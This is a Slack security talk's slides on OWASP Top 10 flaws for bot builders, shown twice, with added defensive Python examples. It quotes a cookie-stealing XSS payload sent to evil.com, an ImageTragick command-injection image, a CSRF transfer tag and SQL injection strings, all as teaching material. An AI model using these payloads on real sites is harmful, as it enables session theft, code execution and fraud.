Security Best Practices
For Bot Builders
Questions? Comments?
Tweet questions, photos or GIFs at
#SlackDevTour or @SlackAPI 😁
Hi! I’m Max Feldman
Product Security @ Slack
mfeldman@slack-corp.com
@MrsBufferworths
Agenda
● Common web application vulnerabilities
(OWASP Top 10)
● Designing an example bot and
○ Finding these vulnerabilities
○ Preventing these vulnerabilities
● Q&A
Why should you care?
● Put food on the table
● A hack can be devastating to users,
and in turn, to business
Why should you care?
● Bots operating in an enterprise
handle highly sensitive information
● Our customers trust us (Slack and
you) to keep their data secure
● Slack conducts security reviews of
App Directory apps
Bots and Integrations
● Bot - digital user, powered by
software
● Integration - linking of multiple
services (e.g. a 3rd-party integrates
with Slack via a slash command)
○ A bot can be part of an
integration
Web Application Security
● Bots and integrations generally rely
on websites/servers
● We need to ensure the security of all
components to ensure the security
of our customers
OWASP Top 10
https://www.owasp.org/index.php/Top_10_2013-Top_10
● OWASP: Open Web Application Security Project
○ Dedicated to web security
○ Makes handy tools (more later)
● Top 10: the top 10 most critical web application
vulnerabilities
Dynamic Web Pages
● A lot of security issues result from trusting user input (as it’s run
on the backend, displayed on the page, etc.)
● Modern web apps are complex - be aware of user input sources
[Diagram: User Input]
1. Injection
● General injection flaws (attacker code running on server)
○ SQLi, OS, others
○ Outcome = remote code execution, arbitrary file read, others
● Remote code execution
○ Attackers can run code on your server
1. Injection
● Remote code execution
○ E.g. ImageTragick (exploit.mvg): processing this image file would
result in an arbitrary command being executed
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg"|<arbitrary call>)'
pop graphic-context
● SQL injection
○ Untrusted user input is parsed and interpreted as SQL code
○ Database dumps, can also lead to RCE
2. Broken Authentication and Session Management
● Weak session tokens, values which get repeated
● No auth checks
● All sorts of diverse problems
○ Sessions not verified
○ Secrets not securely generated/long enough
● A door with no lock
https://www.owasp.org/index.php/Authentication_Cheat_Sheet
https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
3. Cross-Site Scripting
● Attacker injects JavaScript into a web page, which then runs in the
context of that page
● User input is everywhere in dynamic web pages - if left
unsanitized, the browser will interpret it as code
[Diagram: XSS Potential]
3. Cross-Site Scripting
● Cookies - keys to the web application
○ We (we are hackers now) want to steal them
○ Example cookie theft payload:
document.write('<img
src="https://evil.com/collect.gif?cookie=' +
document.cookie + '" />')
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4. Insecure Direct Object Reference
5. Security Misconfiguration
● Out-of-date software
● Unnecessary services running
● Default accounts/passwords
enabled
● Debug mode, stack traces on,
etc
6. Sensitive Data Exposure
● Not adequately protecting data
● Plaintext storage of passwords (or unsalted hashes), logging of
sensitive information
● Not using HTTPS/SSL/encrypted communication
7. Missing Function Level Access Control
● Security which relies on the secrecy of the function itself
○ API functionality which doesn’t perform access control
checks (even though the functionality is not exposed in the
UI) - can be performed with just the request
○ Navigating directly to hidden pages
(http://example.com/app/admin)
8. Cross-Site Request Forgery
● Cross-site request forgery
○ Post-authentication, user is forced to perform a state-changing request
○ The server only sees an authenticated request telling it to
change state, acts accordingly
● Bank example:
○ https://bank.com/transfer?to=mom&amount=20
● GET
<img src=bank.com/transfer?to=evilAccount&amount=10000...>
● POST requests also possible
9. Using Components with Known Vulnerabilities
● Don’t use things that have known vulnerabilities!
● They are vulnerable
10. Underprotected APIs*
● API endpoints which have vulnerabilities or lack
protection/prevention measures, e.g.
○ An API endpoint which doesn’t perform authentication
○ An endpoint served over plain HTTP rather than HTTPS
● Don’t assume that API endpoints will only receive requests from
well-behaving users
○ Even if the APIs are for a mobile app/backend, attackers can
intercept traffic
* This is from the release candidate for the new OWASP Top 10
(overlaps a bit with #7)
How to find and prevent
these vulnerabilities
Scenario: Building a Task Management App
What should our task
manager do?
● Integrate an existing task management service
(taskbot-site.com)
● Users use a slash command to manage
(create/edit/delete) and view tasks
● Users can also manage tasks from taskbot-site.com
How do we find and
prevent vulnerabilities?
Don’t trust anything!
Let’s walk through the OWASP Top 10
XSS, CSRF, SSL issues are what we see most often
(in App Directory reviews)
1. Injection
● Let’s say taskbot-site.com has an API, which receives
requests and then creates a Task
● E.g.
POST taskbot-site.com/create
task="Don't get hacked"
● Tasks are stored into a SQL DB
● Don’t trust user input!
● Use bind variables/parameterized statements for SQL
● Don’t put user input in places where it may be executed
2. Broken Authentication and Session Management
● How does the API know who is actually creating the request?
POST taskbot-site.com/create
task="Don't get hacked"
user="Happy user"
● An attacker can modify the user parameter if we blindly trust it
● Check that sensitive actions require authorization
● Authenticate users, use best practices for session management
○ Most web app frameworks offer these capabilities
○ Burp, ZAP can find some of these issues
● Keep secrets secret! (and unguessable)
3. Cross-Site Scripting
● Let’s say taskbot-site.com has a web frontend for searching
through your tasks
○ taskbot-site.com/search?param="laundry"
● What if param=<malicious javascript>?
3. Cross-Site Scripting
● We need to look for places with user input and make sure we
encode them on the page (your framework can probably do this)
○ &lt; &gt; etc. (HTML entities)
● OWASP has a cheat sheet of inputs which may trigger XSS -
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
● Don’t trust user input!
● ZAP, Burp
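An added example (not from the slides) that covers both the injection slide and this XSS slide, since both concern the same taskbot-site.com search page: the search query written with string pasting beside the parameterized version, and the results rendered with HTML-entity encoding. The in-memory SQLite table, the sample tasks and the users alice and bob are constructed for the example.

```python
import html
import sqlite3
from typing import List

# Constructed sample data: tasks owned by two different users.
SAMPLE_TASKS = [
    ("alice", "Do the laundry"),
    ("alice", "Don't get hacked"),
    ("bob", "Rotate the API keys"),
    ("bob", "Laundry for the weekend"),
]


def make_db() -> sqlite3.Connection:
    """Create the tasks table in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tasks (id INTEGER PRIMARY KEY, owner TEXT, title TEXT)"
    )
    conn.executemany("INSERT INTO tasks (owner, title) VALUES (?, ?)", SAMPLE_TASKS)
    conn.commit()
    return conn


def search_tasks_unsafe(conn: sqlite3.Connection, user: str, param: str) -> List[str]:
    """VULNERABLE: the search term is pasted into the SQL text, so the
    database parses whatever it contains as SQL (injection, slide 1)."""
    query = "SELECT title FROM tasks WHERE owner = '%s' AND title LIKE '%%%s%%'" % (
        user,
        param,
    )
    return [row[0] for row in conn.execute(query)]


def search_tasks_safe(conn: sqlite3.Connection, user: str, param: str) -> List[str]:
    """FIXED: bind variables keep the term as data; the driver never
    interprets it as SQL, whatever characters it contains."""
    query = "SELECT title FROM tasks WHERE owner = ? AND title LIKE ?"
    return [row[0] for row in conn.execute(query, (user, "%" + param + "%"))]


def render_results(param: str, titles: List[str]) -> str:
    """Build the results page. Every dynamic value is HTML-entity encoded
    (the &lt; &gt; advice from slide 3) before it is placed in the markup,
    so a term like <script>...</script> is displayed, not executed."""
    items = "".join("<li>%s</li>" % html.escape(t) for t in titles)
    return "<p>Results for %s</p><ul>%s</ul>" % (html.escape(param), items)


if __name__ == "__main__":
    db = make_db()
    print(search_tasks_safe(db, "alice", "laundry"))  # only Alice's match
    # A term that closes the quoted LIKE pattern makes the unsafe query return
    # every row, including Bob's; the parameterized query treats it as text.
    crafted = "%' OR '%'='"
    print(search_tasks_unsafe(db, "alice", crafted))
    print(search_tasks_safe(db, "alice", crafted))
    print(render_results("<script>alert(1)</script>", ["Do the laundry"]))
```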
4. Insecure Direct Object Reference
● We want users to be able to view their tasks at taskbot-site.com/TaskID
● A new user signs up and creates a task, which points to taskbot-site.com/10012
● What happens if they go to taskbot-site.com/10011?
● Make sure to check authorization for all privileged resources!
○ Most web application frameworks offer this
5. Security Misconfiguration
● Follow the best practices for the security of your framework
○ Disable default credentials
○ Disable verbose debugs, stack traces
● Run/provide access to only what is necessary
● Principle of least privilege - request only the permissions that you
need
○ If using OAuth, request scope with minimum required
capabilities (https://api.slack.com/docs/oauth-scopes)
6. Sensitive Data Exposure
● Use SSL/TLS!
○ But don’t use weak ciphers/protocols
○ Qualys SSL Test, sslyze to test your server
● Do people need to log in to view taskbot-site.com/TaskID?
○ How do we store sensitive information (passwords, etc.)?
■ Plaintext = bad
■ bcrypt, PBKDF2 = good
● Be aware of how data is transmitted and stored - avoid plaintext
7. Missing Function Level Access Control
● taskbot-site.com/admin - how do we control access to this
page?
○ Check that users are authenticated and authorized to reach
this content
● Require auth for these pages
○ Be aware of what these pages are!
○ Admin pages, default pages from the framework
○ Burp and ZAP can help automate this
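An added example (not from the slides) serving both the IDOR slide and this one: the authorization checks for taskbot-site.com/TaskID (does the caller own the object?) and taskbot-site.com/admin (does the caller hold the role?). The session dict, task store, role table and tiny router are constructed stand-ins for whatever framework you use.

```python
from typing import Dict, Tuple

# Constructed data: task 10011 belongs to alice; the new user bob got 10012.
TASKS = {
    10011: {"owner": "alice", "title": "Rotate the API keys"},
    10012: {"owner": "bob", "title": "Don't get hacked"},
}
ROLES = {"alice": "admin", "bob": "user"}


class Unauthenticated(Exception):
    """No valid login in the session."""


class Forbidden(Exception):
    """Logged in, but not allowed to use this function."""


class NotFound(Exception):
    """Object missing, or not visible to this caller (answered identically)."""


def current_user(session: Dict[str, str]) -> str:
    """Identity comes from the server-side session, never from a request
    field such as user="Happy user" that the caller can edit (slide 2)."""
    user = session.get("user")
    if not user:
        raise Unauthenticated("login required")
    return user


def view_task(session: Dict[str, str], task_id: int) -> dict:
    """GET /<TaskID>: authenticate, then check the caller owns the object
    (slide 4). A real ID belonging to someone else gets the same answer as a
    missing one, so walking from 10012 to 10011 reveals nothing."""
    user = current_user(session)
    task = TASKS.get(task_id)
    if task is None or task["owner"] != user:
        raise NotFound(task_id)
    return task


def admin_page(session: Dict[str, str]) -> str:
    """GET /admin: an unpublished URL is not a control (slide 7); the role is
    checked inside the function on every request."""
    user = current_user(session)
    if ROLES.get(user) != "admin":
        raise Forbidden("admin role required")
    return "admin dashboard for %s" % user


def handle(session: Dict[str, str], path: str) -> Tuple[int, str]:
    """Minimal router mapping the outcomes above to HTTP status codes."""
    try:
        if path == "/admin":
            return 200, admin_page(session)
        task_id = path.lstrip("/")
        if task_id.isdigit():
            return 200, view_task(session, int(task_id))["title"]
        raise NotFound(path)
    except Unauthenticated as exc:
        return 401, str(exc)
    except Forbidden as exc:
        return 403, str(exc)
    except NotFound:
        return 404, "not found"
```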
8. Cross-Site Request Forgery
● Task creation directly from taskbot-site.com
GET taskbot-site.com/create?task="Don't get hacked"
● An attacker can create a malicious page containing this request,
<html><img src=taskbot-site.com/create?task="DO get hacked"></html>
● Check for state-changing actions, and add CSRF-prevention (a
CSRF token)
● POST taskbot-site.com/create?task="Don't get hacked"
8. Cross-Site Request Forgery
● CSRF prevention is done via CSRF tokens
○ Unlike cookies, tokens are not sent automatically by the browser,
and they are random, so an attacker can't supply a valid one
○ Can be POST data or part of the header
● POST taskbot-site.com/create
task="Don't get hacked"&csrf_token=<random>
● Most frameworks provide CSRF prevention mechanisms
● ZAP, Burp
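An added example (not from the slides) of the CSRF token scheme above for the taskbot-site.com/create endpoint: one random token per session stored server-side, accepted from the POST body or a header, compared in constant time, with GET refused for the state change. The session dict, the header name X-CSRF-Token and the handler signature are this example's own choices, not a framework API.

```python
import hmac
import secrets
from typing import Dict, List, Tuple

CSRF_KEY = "csrf_token"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create one random token per session and keep it server-side. The page
    or form embeds it; unlike a cookie, the browser never attaches it to a
    request on its own, so a page on another origin cannot supply it."""
    if CSRF_KEY not in session:
        session[CSRF_KEY] = secrets.token_urlsafe(32)  # 256 random bits
    return session[CSRF_KEY]


def csrf_valid(session: Dict[str, str], submitted: str) -> bool:
    """Constant-time comparison against this session's token; an empty or
    absent value on either side is a failure, never a match."""
    expected = session.get(CSRF_KEY, "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def create_task(session: Dict[str, str], method: str, form: Dict[str, str],
                headers: Dict[str, str], store: List[str]) -> Tuple[int, str]:
    """State-changing /create handler. Requires POST (an <img> tag can only
    GET) and a token from the form body or a header. The header name
    X-CSRF-Token is an assumption for this example, not a standard."""
    if method != "POST":
        return 405, "state changes require POST"
    token = form.get("csrf_token") or headers.get("X-CSRF-Token", "")
    if not csrf_valid(session, token):
        return 403, "missing or invalid CSRF token"
    store.append(form.get("task", ""))
    return 201, "created"
```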
9. Using Components with Known Vulnerabilities
● Nikto is a good general scanner
● Many language or framework-specific scanners as well
○ (wpscan for wordpress)
● Update and patch your systems and your software!
● For example, don’t run taskbot-site.com on Apache 1.0 on
an OS from 1994
10. Underprotected APIs
● Suppose we want taskbot-site.com/create to be available
to Slack, but we assume users won’t use it
○ If we have no protection, attackers can still find and use this
API endpoint
○ Verify that requests originate from Slack (we send along a
token for verification, https://api.slack.com/tutorials/your-first-slash-command)
● Check hidden/unpublished APIs as well (attackers can still access
them)
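An added example (not from the slides, and not Slack's own code) of verifying that a request to taskbot-site.com/create really came from Slack. It shows the verification-token check the slide mentions, done in constant time, and also the signing-secret check Slack introduced later (HMAC-SHA256 over "v0:<timestamp>:<raw body>", compared with the X-Slack-Signature header, with stale timestamps rejected). The secret values and the request body are constructed for the example; the headers dict stands in for the real request object.

```python
import hashlib
import hmac
import time
from typing import Dict, Optional

# Constructed secrets for this example; real values belong in app config.
VERIFICATION_TOKEN = "constructed-verification-token"
SIGNING_SECRET = "constructed-signing-secret"


def token_matches(form: Dict[str, str], expected: str = VERIFICATION_TOKEN) -> bool:
    """Check the token field Slack includes in slash-command payloads (the
    check the slide refers to), in constant time. It is a shared secret:
    anyone who learns it can forge requests, so keep it out of logs."""
    return hmac.compare_digest(form.get("token", "").encode(), expected.encode())


def slack_signature(raw_body: str, timestamp: str, secret: str = SIGNING_SECRET) -> str:
    """v0=HMAC-SHA256(secret, "v0:<timestamp>:<raw body>") as hex. Slack signs
    the exact bytes it sent, so verify the raw body, not a re-serialized form."""
    base = "v0:%s:%s" % (timestamp, raw_body)
    return "v0=" + hmac.new(secret.encode(), base.encode(), hashlib.sha256).hexdigest()


def signature_matches(headers: Dict[str, str], raw_body: str,
                      secret: str = SIGNING_SECRET, now: Optional[float] = None,
                      max_age: int = 300) -> bool:
    """Signing-secret check. Rejects missing headers, timestamps older than
    max_age seconds (replay of a captured request) and any mismatch, using a
    constant-time comparison for the signature itself."""
    ts = headers.get("X-Slack-Request-Timestamp", "")
    sig = headers.get("X-Slack-Signature", "")
    if not ts.isdigit() or not sig:
        return False
    now = time.time() if now is None else now
    if abs(now - int(ts)) > max_age:
        return False
    expected = slack_signature(raw_body, ts, secret)
    return hmac.compare_digest(expected.encode(), sig.encode())


def accept_slash_command(headers: Dict[str, str], raw_body: str,
                         form: Dict[str, str], now: Optional[float] = None) -> bool:
    """Policy chosen for this example: the signature must verify, and the
    token must match as well where one is still configured. Everything else
    (an unsigned GET from a browser, a guessed token) is dropped before the
    task is created."""
    return signature_matches(headers, raw_body, now=now) and token_matches(form)
```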
Security Development Lifecycle
● We’ve talked about specific vulnerabilities, but also be aware of
the development process
Key Takeaways
● Don’t trust user input!
○ Where is dynamic data influencing the control flow of
your application?
○ Think of how an attacker might abuse your
system
● Think about security from the beginning
○ Use an SDL, design securely, have a process
Key Takeaways
● Principle of least privilege - limit the power and
permissions allowed to services to bare
minimum
○ Restrict OAuth scope to what’s necessary
○ Over-permissioned services are dangerous
Q&A
Helpful Resources
OWASP
Nikto
ZAP, Burp
WPScan
Qualys SSL, SSLyze
sqlmap
Nmap
General Slack Security
Slack App Directory Security Review
Stay in touch
● Install the Platform News App for fresh
news, delivered straight to Slack
● Chat with us on Twitter @SlackAPI

Ensuring Technical Readiness For Copilot in Microsoft 365
 

Security Best Practices for Bot Builders

  • 13. 1. Injection
    ● Remote code execution
      ○ E.g. ImageTragick - exploit.mvg - processing this image would result in an arbitrary call being executed
        push graphic-context
        viewbox 0 0 640 480
        fill 'url(https://127.0.0.1/oops.jpg"|<arbitrary call>)'
        pop graphic-context
    ● SQL injection
      ○ Untrusted user input is parsed and interpreted as SQL code
      ○ Database dumps, can also lead to RCE
  • 14. 2. Broken Authentication and Session Management
    ● Weak session tokens, values which get repeated
    ● No auth checks
    ● All sorts of diverse problems
      ○ Sessions not verified
      ○ Secrets not securely generated/long enough
    ● A door with no lock
    https://www.owasp.org/index.php/Authentication_Cheat_Sheet
    https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
  • 15. 3. Cross-Site Scripting
    ● Attacker injects JavaScript into a web page, which then runs in the context of that page
    ● User input is everywhere in dynamic web pages - if left unsanitized, the browser will interpret it as code
    [Figure: XSS Potential]
  • 16. 3. Cross-Site Scripting
    ● Cookies - keys to the web application
      ○ We (we are hackers now) want to steal them
      ○ Example cookie theft payload:
        document.write('<img src="https://evil.com/collect.gif?cookie=' + document.cookie + '" />')
    https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  • 17. 4. Insecure Direct Object Reference
  • 18. 5. Security Misconfiguration
    ● Out-of-date software
    ● Unnecessary services running
    ● Default accounts/passwords enabled
    ● Debug mode, stack traces on, etc.
  • 19. 6. Sensitive Data Exposure
    ● Not adequately protecting data
    ● Plaintext storage of passwords (or unsalted hashes), logging of sensitive information
    ● Not using HTTPS/SSL/encrypted communication
  • 20. 7. Missing Function Level Access Control
    ● Security which relies on the secrecy of the function itself
      ○ API functionality which doesn't perform access control checks (even though the functionality is not exposed in the UI) - can be performed with just the request
      ○ Navigating directly to hidden pages (http://example.com/app/admin)
  • 21. 8. Cross-Site Request Forgery
    ● Cross-site request forgery
      ○ Post-authentication, user is forced to perform a state-changing request
      ○ The server only sees an authenticated request telling it to change state, acts accordingly
    ● Bank example:
      ○ https://bank.com/transfer?to=mom&amount=20
  • 22. 8. Cross-Site Request Forgery
    ● Cross-site request forgery
      ○ Post-authentication, user is forced to perform a state-changing request
      ○ The server only sees an authenticated request telling it to change state, acts accordingly
    ● Bank example:
      ○ https://bank.com/transfer?to=mom&amount=20
    ● GET <img src=bank.com/transfer?to=evilAccount&amount=10000...>
    ● POST requests also possible
  • 23. 9. Using Components with Known Vulnerabilities
    ● Don't use things that have known vulnerabilities!
    ● They are vulnerable
  • 24. 10. Underprotected APIs*
    ● API endpoints which have vulnerabilities or lack protection/prevention measures, e.g.
      ○ An API endpoint which doesn't perform authentication
      ○ An HTTP endpoint
    ● Don't assume that API endpoints will only receive requests from well-behaving users
      ○ Even if the APIs are for a mobile app/backend, attackers can intercept traffic
    * This is from the release candidate for the new OWASP Top 10 (overlaps a bit with #7)
  • 25. How to find and prevent these vulnerabilities
    Scenario: Building a Task Management App
  • 26. What should our task manager do?
    ● Integrate an existing task management service (taskbot-site.com)
    ● Users use a slash command to manage (create/edit/delete) and view tasks
    ● Users can also manage tasks from taskbot-site.com
  • 27. How do we find and prevent vulnerabilities?
    Don't trust anything!
    Let's walk through the OWASP Top 10
    XSS, CSRF, SSL issues are what we see most often (in App Directory reviews)
  • 28. 1. Injection
    ● Let's say taskbot-site.com has an API, which receives requests and then creates a Task
    ● E.g. POST taskbot-site.com/create task="Don't get hacked"
    ● Tasks are stored into a SQL DB
    ● Don't trust user input!
    ● Use bind variables/parameterized statements for SQL
    ● Don't put user input in places where it may be executed
  • 29. 2. Broken Authentication and Session Management
    ● How does the API know who is actually creating the request?
      POST taskbot-site.com/create task="Don't get hacked" user="Happy user"
    ● An attacker can modify the user parameter if we blindly trust it
    ● Check that sensitive actions require authorization
    ● Authenticate users, use best practices for session management
      ○ Most web app frameworks offer these capabilities
      ○ Burp, ZAP can find some of these issues
    ● Keep secrets secret! (and unguessable)
  • 30. 3. Cross-Site Scripting
    ● Let's say taskbot-site.com has a web frontend for searching through your tasks
      ○ taskbot-site.com/search?param="laundry"
    ● What if param=<malicious javascript>?
  • 31. 3. Cross-Site Scripting
    ● We need to look for places with user input and make sure we encode them on the page (your framework can probably do this)
      ○ &lt; &gt; etc. (HTML entities)
    ● OWASP has a cheat sheet of inputs which may trigger XSS - https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    ● Don't trust user input!
    ● ZAP, Burp
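An added illustration of the encoding step, not code from the talk: the taskbot-site.com search page rendered with and without html.escape. The page layout and the "param" echo are assumptions; the second payload shows why the attribute context needs quote=True as well.

```python
import html

# Constructed example: the search page echoes the "param" query value back
# into the page twice, once as a text node and once inside an attribute value.

def render_search_page_unsafe(param: str) -> str:
    """Vulnerable: raw user input is concatenated straight into the markup."""
    return (f"<p>Results for: {param}</p>"
            f'<input name="param" value="{param}">')

def render_search_page(param: str) -> str:
    """Fixed: html.escape turns < > & " ' into entities, so the browser
    shows the input as text instead of parsing it as tags or attributes."""
    safe = html.escape(param, quote=True)
    return (f"<p>Results for: {safe}</p>"
            f'<input name="param" value="{safe}">')

def markup_survives(page: str, fragment: str) -> bool:
    """True when the attacker-supplied fragment is still live markup in the page."""
    return fragment in page

# Constructed payloads of the kind listed in the OWASP XSS cheat sheet:
# one injects a tag, the other breaks out of the value="..." attribute.
TAG_PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'
```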
  • 32. 4. Insecure Direct Object Reference
    ● We want users to be able to view their tasks at taskbot-site.com/TaskID
    ● A new user signs up and creates a task, which points to taskbot-site.com/10012
    ● What happens if they go to taskbot-site.com/10011?
    ● Make sure to check authorization for all privileged resources!
      ○ Most web application frameworks offer this
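One added example serving both the SQL injection point (slide 28) and the IDOR point (slide 32); it is not code from the talk. An in-memory SQLite database stands in for the taskbot-site.com task store, and the table and column names are assumptions.

```python
import sqlite3

# Constructed example: tasks table with an owner column so that lookups can be
# scoped to the authenticated user (the IDOR fix) and inserts use bind variables
# (the SQL injection fix).

def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tasks (id INTEGER PRIMARY KEY, owner TEXT, task TEXT)")
    return db

def create_task_unsafe(db: sqlite3.Connection, owner: str, task: str) -> None:
    """Vulnerable: user input is spliced into the SQL text, so a quote in the
    task (even the talk's own "Don't get hacked") changes the statement."""
    db.executescript(
        f"INSERT INTO tasks (owner, task) VALUES ('{owner}', '{task}')")

def create_task(db: sqlite3.Connection, owner: str, task: str) -> int:
    """Fixed: bind variables keep the input as data, whatever it contains."""
    cur = db.execute("INSERT INTO tasks (owner, task) VALUES (?, ?)", (owner, task))
    return cur.lastrowid

def get_task(db: sqlite3.Connection, viewer: str, task_id: int):
    """IDOR prevention: the query is scoped to the authenticated viewer, so
    requesting a neighbouring id (10011 next to your 10012) returns nothing
    rather than another user's task."""
    row = db.execute("SELECT task FROM tasks WHERE id = ? AND owner = ?",
                     (task_id, viewer)).fetchone()
    return row[0] if row else None

def count_tasks(db: sqlite3.Connection) -> int:
    return db.execute("SELECT COUNT(*) FROM tasks").fetchone()[0]

def unsafe_insert_errors(db: sqlite3.Connection, owner: str, task: str) -> bool:
    """True when the string-built INSERT fails to parse, the classic sign that
    the input is being interpreted as SQL rather than stored as data."""
    try:
        create_task_unsafe(db, owner, task)
        return False
    except sqlite3.Error:
        return True

# Constructed malicious task text: closes the string literal and appends a
# second statement, which executescript happily runs in the unsafe version.
INJECTED_TASK = "x'); DELETE FROM tasks; --"
```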
  • 33. 5. Security Misconfiguration
    ● Follow the best practices for the security of your framework
      ○ Disable default credentials
      ○ Disable verbose debugs, stack traces
    ● Run/provide access to only what is necessary
    ● Principle of least privilege - request only the permissions that you need
      ○ If using OAuth, request scope with minimum required capabilities (https://api.slack.com/docs/oauth-scopes)
  • 34. 6. Sensitive Data Exposure
    ● Use SSL/TLS!
      ○ But don't use weak ciphers/protocols
      ○ Qualys SSL Test, sslyze to test your server
    ● Do people need to log in to taskbot-site.com/TaskID?
      ○ How do we store sensitive information (passwords, etc.)?
        ■ Plaintext = bad
        ■ bcrypt, PBKDF2 = good
    ● Be aware of how data is transmitted and stored - avoid plaintext
  • 35. 7. Missing Function Level Access Control
    ● taskbot-site.com/admin - how do we control access to this page?
      ○ Check that users are authenticated and authorized to reach this content
    ● Require auth for these pages
      ○ Be aware of what these pages are!
      ○ Admin pages, default pages from the framework
      ○ Burp and ZAP can help automate this
  • 36. 8. Cross-Site Request Forgery
    ● Task creation directly from taskbot-site.com
      GET taskbot-site.com/create?task="Don't get hacked"
    ● An attacker can create a malicious page containing this request,
      <html><img src=taskbot-site.com/create?task="DO get hacked"></html>
    ● Check for state-changing actions, and add CSRF-prevention (a CSRF token)
    ● POST taskbot-site.com/create?task="Don't get hacked"
  • 37. 8. Cross-Site Request Forgery
    ● CSRF prevention done via CSRF tokens
      ○ Tokens not sent automatically (so an attacker can't guess them)
      ○ Can be POST data or part of the header
    ● POST taskbot-site.com/create task="Don't get hacked"&csrf_token=<random>
    ● Most frameworks provide CSRF prevention mechanisms
    ● ZAP, Burp
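An added example of the CSRF defence on slides 36 and 37, not code from the talk: a per-session token checked by the POST taskbot-site.com/create handler. The session store, cookie name and handler signature are assumptions standing in for whatever your framework provides.

```python
import hmac
import secrets

# Constructed example: the browser attaches the session cookie to any request,
# including one triggered by an attacker's <img> or form, so the cookie alone
# proves nothing about where the request came from. The CSRF token does,
# because it lives in the page we served and other origins cannot read it.
SESSIONS = {}  # session id -> {"user": ..., "csrf_token": ...}

def start_session(user: str) -> str:
    sid = secrets.token_urlsafe(32)  # unguessable session id
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid

def csrf_token_for(sid: str) -> str:
    """Embedded in the task form served to the logged-in user."""
    return SESSIONS[sid]["csrf_token"]

def handle_create(method: str, cookies: dict, form: dict):
    """Returns (status, body) for the /create endpoint."""
    if method != "POST":
        return 405, "state-changing actions must be POST"  # kills the <img src=...> trick
    session = SESSIONS.get(cookies.get("session", ""))
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf_token", "")
    # constant-time comparison on bytes; str compare_digest rejects non-ASCII input
    if not hmac.compare_digest(supplied.encode("utf-8"),
                               session["csrf_token"].encode("utf-8")):
        return 403, "missing or wrong CSRF token"
    return 200, f"created task {form.get('task', '')!r} for {session['user']}"
```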
  • 38. 9. Using Components with Known Vulnerabilities
    ● Nikto is a good general scanner
    ● Many language or framework-specific scanners as well
      ○ (wpscan for WordPress)
    ● Update and patch your systems and your software!
    ● For example, don't run taskbot-site.com on Apache 1.0 on an OS from 1994
  • 39. 10. Underprotected APIs
    ● Suppose we want taskbot-site.com/create to be available to Slack, but we assume users won't use it
      ○ If we have no protection, attackers can still find and use this API endpoint
      ○ Verify that requests originate from Slack (we send along a token for verification, https://api.slack.com/tutorials/your-first-slash-command)
    ● Check hidden/unpublished APIs as well (attackers can still access them)
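An added example of the verification step above, not code from the talk or Slack's SDKs: the slash command handler parses the form-encoded body and refuses any request whose token does not match the app's verification token. The token value is a placeholder and the handler signature is an assumption.

```python
import hmac
from urllib.parse import parse_qs

# Constructed example. Slack sends slash command requests as
# application/x-www-form-urlencoded bodies that include a "token" field;
# the value below is a placeholder for the one shown in your app's settings.
SLACK_VERIFICATION_TOKEN = "REPLACE_WITH_YOUR_APP_VERIFICATION_TOKEN"

def handle_slash_command(raw_body: str, expected_token: str = SLACK_VERIFICATION_TOKEN):
    """Returns (status, body). Anyone who discovers the endpoint can POST to it,
    so the token check runs before any task is created, not after."""
    fields = {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}
    supplied = fields.get("token", "")
    # constant-time comparison, and a missing token simply fails to match
    if not hmac.compare_digest(supplied.encode("utf-8"), expected_token.encode("utf-8")):
        return 401, "request did not come from Slack"
    return 200, f"task created: {fields.get('text', '')}"

# Constructed sample bodies in the shape of a slash command request.
GOOD_BODY = ("token=REPLACE_WITH_YOUR_APP_VERIFICATION_TOKEN"
             "&command=%2Ftask&text=Don%27t+get+hacked&user_id=U0000000")
BAD_BODY = "command=%2Ftask&text=DO+get+hacked&user_id=U0000000"  # token missing
```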
  • 40. Security Development Lifecycle
    ● We've talked about specific vulnerabilities, but also be aware of the development process
  • 41. Key Takeaways
    ● Don't trust user input!
      ○ Where is dynamic data influencing control of your application?
      ○ Think of how an attacker might abuse your system
    ● Think about security from the beginning
      ○ Use an SDL, design securely, have a process
  • 42. Key Takeaways
    ● Principle of least privilege - limit the power and permissions allowed to services to the bare minimum
      ○ Restrict OAuth scope to what's necessary
      ○ Over-permissioned services are dangerous
  • 43. Q&A
  • 44. Helpful Resources
    ● OWASP
    ● Nikto
    ● ZAP, Burp
    ● WPScan
    ● Qualys SSL, SSLyze
    ● sqlmap
    ● Nmap
    ● General Slack Security
    ● Slack App Directory Security Review
  • 45. Stay in touch
    ● Install the Platform News App for fresh news, delivered straight to Slack
    ● Chat with us on Twitter @SlackAPI